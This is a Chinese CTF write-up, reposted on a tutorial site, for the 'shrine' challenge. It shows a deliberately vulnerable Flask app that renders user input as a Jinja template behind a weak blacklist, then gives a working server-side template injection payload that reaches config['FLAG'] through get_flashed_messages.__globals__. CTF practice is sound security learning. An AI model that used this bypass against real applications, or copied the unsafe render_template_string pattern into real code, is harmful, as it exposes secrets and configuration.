栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

攻防世界-shrine

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

攻防世界-shrine

题目

传送门

WP

打开题目 有一段代码

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 
@app.route('/') 
def index(): 
    return open(__file__).read() 
@app.route('/shrine/') 
def shrine(shrine): 
    def safe_jinja(s): 
        s = s.replace('(', '').replace(')', '') 
        blacklist = ['config', 'self'] 
        return ''.join(['{{% set{}=None %}}'.format(c) for c in blacklist]) + s 
        # 构建 jinja 模板
    return flask.render_template_string(safe_jinja(shrine)) 
if __name__ == '__main__': 
    app.run(debug=True) 

可以发现jinja模板调用 我们尝试注入
(再确定下是否存在SSTI
payload

http://111.200.241.244:56734/shrine/{{7*7}}

发现确实存在SSTI漏洞

构造payload

http://111.200.241.244:56734/shrine/%7B%7Bget_flashed_messages.__globals__['current_app'].config['FLAG']%7D%7D
补充

get_flashed_messages 表示取值
current_app 表示代理对象,指向flask核心对象和reques的请求类

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/326957.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号